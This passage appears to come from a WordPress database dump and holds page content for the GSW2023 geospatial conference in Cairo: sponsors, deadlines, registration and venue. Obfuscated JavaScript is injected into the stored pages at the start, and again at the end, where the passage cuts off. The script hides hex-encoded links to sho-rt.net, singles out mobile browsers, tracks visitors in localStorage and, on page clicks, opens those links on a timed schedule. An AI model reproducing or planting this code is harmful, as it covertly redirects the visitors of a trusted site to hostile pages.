_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:38:36','2023-05-16 01:38:36','',3066,'https://gsw2023.com/?p=4483',0,'revision','',0),
(4484,1,'2023-05-16 01:39:46','2023-05-16 01:39:46','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201149259{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Platinum Sponsors</strong></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 